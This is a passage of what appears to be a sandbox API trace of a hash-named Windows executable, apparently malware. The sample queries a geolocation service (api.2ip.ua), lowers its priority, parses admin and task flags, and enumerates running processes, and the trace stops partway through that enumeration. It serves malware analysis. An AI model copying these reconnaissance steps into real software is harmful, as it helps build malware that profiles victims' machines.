0x2c1838 [0102.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 107 [0102.679] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x6b) returned 0x2c18a8 [0102.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x2c18a8, cbMultiByte=107, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpUsedDefaultChar=0x0) returned 107 [0102.679] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1838) returned 0x68 [0102.679] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1838, Size=0x6c) returned 0x2c1920 [0102.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.680] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x17) returned 0x2c1750 [0102.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x2c1750, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0102.680] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1920) returned 0x6c [0102.680] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1920, Size=0x70) returned 0x2c1920 [0102.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0102.680] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xf) returned 0x2b3250 [0102.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x2b3250, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0102.680] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1920) returned 0x70 [0102.680] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1920, Size=0x74) returned 0x2c1920 [0102.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0102.680] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x16) returned 0x2c1770 [0102.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x2c1770, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0102.680] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1920) returned 0x74 [0102.680] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1920, Size=0x78) returned 0x2c1920 [0102.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0102.680] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2a) returned 0x2bb508 [0102.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x2bb508, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0102.680] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1920) returned 0x78 [0102.680] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1920, Size=0x7c) returned 0x2c1920 [0102.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0102.680] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x29) returned 0x2bb540 [0102.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x2bb540, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0102.681] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1920) returned 0x7c [0102.681] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1920, Size=0x80) returned 0x2c1920 [0102.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0102.681] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x16) returned 0x2c1838 [0102.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x2c1838, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 22 [0102.681] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1920) returned 0x80 [0102.681] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1920, Size=0x84) returned 0x2c1920 [0102.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.681] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x13) returned 0x2c1858 [0102.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x2c1858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=kEecfMwgj", lpUsedDefaultChar=0x0) returned 19 [0102.681] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1920) returned 0x84 [0102.681] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1920, Size=0x88) returned 0x2c1920 [0102.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0102.681] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1f) returned 0x2bec70 [0102.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x2bec70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 31 [0102.681] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1920) returned 0x88 [0102.681] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1920, Size=0x8c) returned 0x2c1920 [0102.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0102.681] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x12) returned 0x2c1878 [0102.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x2c1878, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0102.681] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1920) returned 0x8c [0102.681] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1920, Size=0x90) returned 0x2c1920 [0102.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.682] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x18) returned 0x2c19b8 [0102.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x2c19b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0102.682] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c1920) returned 0x90 [0102.682] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c1920, Size=0x94) returned 0x2c19d8 [0102.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0102.682] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x46) returned 0x2b6ee0 [0102.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x2b6ee0, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0102.682] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c19d8) returned 0x94 [0102.682] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2c19d8, Size=0x98) returned 0x2c19d8 [0102.772] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c0f20) returned 0x80 [0102.773] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c0f20) returned 0x80 [0102.773] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c0f20) returned 0x80 [0102.806] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x8ec) returned 0x2c1a78 [0102.806] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c0f20) returned 0x80 [0102.807] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x10) returned 0x2b3268 [0102.807] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c0f20) returned 0x80 [0102.807] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c0f20) returned 0x80 [0102.807] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c0f20) returned 0x80 [0102.836] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2c0f20) returned 0x80 [0102.856] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0102.946] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x40) returned 0x2b27f0 [0102.946] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0103.795] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18c1c8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e9c8 | out: lpBuffer=0x18c1c8*, lpdwNumberOfBytesRead=0x18e9c8*=0x22a) returned 1 [0103.795] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0103.795] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0103.795] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2c8718 [0103.803] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x240) returned 0x2dbe38 [0103.819] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2dbe38 | out: hHeap=0x2a0000) returned 1 [0103.820] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2c8718 | out: hHeap=0x2a0000) returned 1 [0103.820] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b27f0 | out: hHeap=0x2a0000) returned 1 [0103.820] GetCurrentProcess () returned 0xffffffff [0103.820] GetLastError () returned 0x0 [0103.820] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0103.836] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x10) returned 0x2dba50 [0103.836] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x8ec) returned 0x2afd6c0 [0103.888] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x800) returned 0x2dc3a8 [0103.888] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2dc3a8, nSize=0x400 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x5f [0103.888] PathRemoveFileSpecW (in: pszPath="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\Desktop") returned 1 [0103.896] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2afdfb8 [0103.896] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --Admin IsNotAutoStart IsNotTask" [0103.896] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18eaa8 | out: pNumArgs=0x18eaa8) returned 0x2e2828*="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0103.896] lstrcpyW (in: lpString1=0x18f738, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0103.896] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0103.896] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0103.924] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --Admin IsNotAutoStart IsNotTask" [0103.924] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18ea44 | out: pNumArgs=0x18ea44) returned 0x2e2828*="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0103.924] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned="0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0103.924] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x752b0000 [0103.925] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcesses") returned 0x0 [0103.925] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcessModules") returned 0x0 [0103.925] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleBaseNameW") returned 0x0 [0103.925] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x75950000 [0103.928] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcesses") returned 0x75951544 [0103.928] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcessModules") returned 0x75951408 [0103.928] GetProcAddress (hModule=0x75950000, lpProcName="GetModuleBaseNameW") returned 0x7595152c [0103.928] EnumProcesses (in: lpidProcess=0x184240, cb=0xa000, lpcbNeeded=0x18ea50 | out: lpidProcess=0x184240, lpcbNeeded=0x18ea50) returned 1 [0103.935] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0103.935] CloseHandle (hObject=0x0) returned 0 [0103.935] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0103.935] CloseHandle (hObject=0x0) returned 0 [0103.935] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x0 [0103.935] CloseHandle (hObject=0x0) returned 0 [0103.935] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0103.935] CloseHandle (hObject=0x0) returned 0 [0103.935] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x0 [0103.935] CloseHandle (hObject=0x0) returned 0 [0103.935] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x0 [0103.935] CloseHandle (hObject=0x0) returned 0 [0103.935] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1a8) returned 0x0 [0103.935] CloseHandle (hObject=0x0) returned 0 [0103.935] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0103.935] CloseHandle (hObject=0x0) returned 0 [0103.935] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0103.935] CloseHandle (hObject=0x0) returned 0 [0103.935] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0103.935] CloseHandle (hObject=0x0) returned 0 [0103.935] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0103.936] CloseHandle (hObject=0x0) returned 0 [0103.936] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0103.936] CloseHandle (hObject=0x0) returned 0 [0103.936] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0103.936] CloseHandle (hObject=0x0) returned 0 [0103.936] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0103.936] CloseHandle (hObject=0x0) returned 0 [0103.936] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0103.936] CloseHandle (hObject=0x0) returned 0 [0103.936] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0103.936] CloseHandle (hObject=0x0) returned 0 [0103.936] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0103.936] CloseHandle (hObject=0x0) returned 0 [0103.936] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x0 [0103.936] CloseHandle (hObject=0x0) returned 0 [0103.936] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x474) returned 0x4e4 [0103.936] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0103.936] CloseHandle (hObject=0x4e4) returned 1 [0103.936] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x494) returned 0x0 [0103.937] CloseHandle (hObject=0x0) returned 0 [0103.937] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x520) returned 0x0 [0103.937] CloseHandle (hObject=0x0) returned 0 [0103.937] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x558) returned 0x0 [0103.937] CloseHandle (hObject=0x0) returned 0 [0103.937] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x770) returned 0x4e4 [0103.937] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0103.937] CloseHandle (hObject=0x4e4) returned 1 [0103.937] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x77c) returned 0x4e4 [0103.937] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0103.937] CloseHandle (hObject=0x4e4) returned 1 [0103.937] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x398) returned 0x0 [0103.937] CloseHandle (hObject=0x0) returned 0 [0103.937] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0103.937] CloseHandle (hObject=0x0) returned 0 [0103.937] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x300) returned 0x0 [0103.937] CloseHandle (hObject=0x0) returned 0 [0103.937] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c4) returned 0x0 [0103.938] CloseHandle (hObject=0x0) returned 0 [0103.938] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x594) returned 0x0 [0103.938] CloseHandle (hObject=0x0) returned 0 [0103.938] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x744) returned 0x4e4 [0103.938] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.941] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xc50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0103.941] CloseHandle (hObject=0x4e4) returned 1 [0103.941] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x818) returned 0x4e4 [0103.941] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.945] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0xc50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0103.945] CloseHandle (hObject=0x4e4) returned 1 [0103.946] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x4e4 [0103.946] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.947] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x11b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="moment_free.exe") returned 0xf [0103.947] CloseHandle (hObject=0x4e4) returned 1 [0103.947] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x4e4 [0103.947] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.948] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x1d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="light.exe") returned 0x9 [0103.948] CloseHandle (hObject=0x4e4) returned 1 [0103.948] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x4e4 [0103.948] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.950] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x2d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="racestreetsong.exe") returned 0x12 [0103.950] CloseHandle (hObject=0x4e4) returned 1 [0103.950] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x4e4 [0103.950] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.951] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x980000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="western hard.exe") returned 0x10 [0103.951] CloseHandle (hObject=0x4e4) returned 1 [0103.951] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x4e4 [0103.952] EnumProcessModules (in: hProcess=0x4e4, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0103.953] GetModuleBaseNameW (in: hProcess=0x4e4, hModule=0x3e0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="whatcompany.exe") returned 0xf [0103.953] CloseHandle (hObject=0x4e4) returned 1 [0103.953] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x4e4 [0103.953] 